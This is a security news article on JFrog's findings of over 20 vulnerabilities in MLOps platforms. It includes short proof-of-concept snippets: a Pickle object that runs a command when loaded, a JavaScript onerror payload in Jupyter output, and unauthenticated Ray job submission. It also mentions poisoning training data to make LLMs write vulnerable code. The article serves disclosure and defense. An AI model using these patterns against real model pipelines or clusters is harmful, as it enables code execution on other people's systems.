    Researchers Uncover Over 20 Supply Chain Vulnerabilities in MLOps Platforms

    Cybersecurity researchers have raised alarms about significant security risks in the machine learning (ML) software supply chain, following the discovery of over 20 vulnerabilities that could be exploited to compromise MLOps platforms.

    These vulnerabilities, broadly categorized as inherent flaws and implementation flaws, could have severe consequences, ranging from arbitrary code execution to the loading of malicious datasets.

    MLOps platforms are designed to enable the creation and execution of ML model pipelines, with a model registry serving as a repository for storing and versioning trained ML models. These models can be embedded within applications or made accessible to clients via an API, also known as model-as-a-service.

    “Inherent vulnerabilities are caused by the underlying formats and processes used in the target technology,” JFrog researchers explained in a detailed report. For instance, some ML models can be manipulated to run attacker-controlled code due to the automatic code execution features in formats like Pickle model files. This vulnerability extends to certain dataset formats and libraries, which could trigger malware attacks simply by loading a publicly available dataset.
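    To illustrate the Pickle risk, the minimal sketch below shows how an object can embed a command that runs the moment the file is deserialized; the class name and command are purely hypothetical and stand in for a booby-trapped "model" file.

```python
import os
import pickle


class MaliciousModel:
    """Hypothetical stand-in for a booby-trapped 'model' object."""

    def __reduce__(self):
        # pickle records the callable returned here and invokes it
        # automatically during pickle.load() -- no explicit call needed.
        return (os.system, ("echo attacker code runs at load time",))


# Attacker side: serialize the object and distribute it as a trained model.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# Victim side: merely loading the "model" executes the embedded command.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```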

    One notable example of an inherent vulnerability involves JupyterLab, a web-based interactive computational environment that allows users to execute code blocks and view the results. “An inherent issue is the handling of HTML output when running code blocks in Jupyter,” the researchers pointed out. The problem is that JavaScript in a cell's output is not sandboxed from the parent web application when it executes, so it can interact with the notebook itself, for example by adding a new code cell and running it, which ultimately allows arbitrary Python code to execute.
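    The sketch below (a hypothetical cell run inside a JupyterLab session) shows the mechanism: HTML emitted as cell output is rendered in the same page as the notebook UI, so any JavaScript the front end executes from that output shares the page with the notebook rather than running in an isolated sandbox. Whether a given payload actually fires depends on JupyterLab's output sanitization and notebook trust settings.

```python
# Run inside a Jupyter/JupyterLab code cell (hypothetical demonstration).
from IPython.display import HTML, display

# HTML output is rendered in the notebook page itself. If the front end
# executes script from this output (e.g., an event handler), that script
# can drive the notebook UI -- for instance, by inserting and running a
# new code cell.
untrusted_html = '<img src="x" onerror="alert(\'JS from cell output\')">'
display(HTML(untrusted_html))
```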

    In fact, JFrog identified a cross-site scripting (XSS) vulnerability in MLflow (CVE-2024-27132, CVSS score: 7.5), caused by insufficient sanitization when running an untrusted recipe, which could result in client-side code execution within JupyterLab.

    The second category of vulnerabilities stems from implementation weaknesses, such as a lack of authentication in MLOps platforms. Such a flaw could allow a threat actor with network access to gain code-execution capabilities by abusing the ML pipeline feature. One example is unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), a flaw adversaries have exploited in the wild to deploy cryptocurrency miners.
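    As a sketch of why missing authentication is so dangerous, the snippet below uses Ray's job-submission client against a hypothetical, network-reachable head node; because the endpoint requires no credentials, submitting a "job" amounts to arbitrary code execution on the cluster.

```python
# Hypothetical target address; the point is that no credentials are exchanged.
from ray.job_submission import JobSubmissionClient

client = JobSubmissionClient("http://ray-head.internal:8265")

# The entrypoint is an arbitrary command executed on the cluster -- the same
# primitive abused in the wild to drop cryptocurrency miners on exposed
# Ray deployments.
job_id = client.submit_job(
    entrypoint='python -c "print(\'running on the cluster\')"'
)
print("submitted job:", job_id)
```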

    Another critical implementation weakness is a container escape in Seldon Core, which lets an attacker who can upload a malicious model to the inference server gain code execution inside the serving container and, from there, move laterally across the cloud environment.

    These vulnerabilities could be weaponized not only to infiltrate and spread within an organization but also to compromise servers. “If you’re deploying a platform that allows for model serving, be aware that anyone who can serve a new model could also run arbitrary code on that server,” researchers warned. They emphasized the need for isolating and hardening the environment that runs these models against container escapes.
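    Alongside container-level isolation, one commonly recommended mitigation on the loading side is to avoid code-executing serialization formats where possible; the sketch below assumes a PyTorch-based workflow and is only illustrative.

```python
# Illustrative hardening step, assuming a PyTorch-based pipeline.
import torch

# weights_only=True restricts deserialization to tensors and plain containers,
# so a checkpoint cannot smuggle in arbitrary objects whose unpickling would
# run code. Formats such as safetensors avoid pickle altogether.
state_dict = torch.load("untrusted_checkpoint.pt", weights_only=True)
```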

    This disclosure follows recent findings by Palo Alto Networks Unit 42 of two now-patched vulnerabilities in the open-source LangChain generative AI framework, which could have allowed arbitrary code execution and access to sensitive data. Similarly, Trail of Bits recently identified four issues in the Ask Astro chatbot application, which could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS) attacks.

    As security vulnerabilities continue to be exposed in AI-powered applications, new techniques are also being developed to poison training datasets, ultimately aiming to trick large language models (LLMs) into generating vulnerable code. A group of academics from the University of Connecticut highlighted the sophisticated payload transformation methods used in such attacks, ensuring that both poisoned data and generated code evade vulnerability detection.
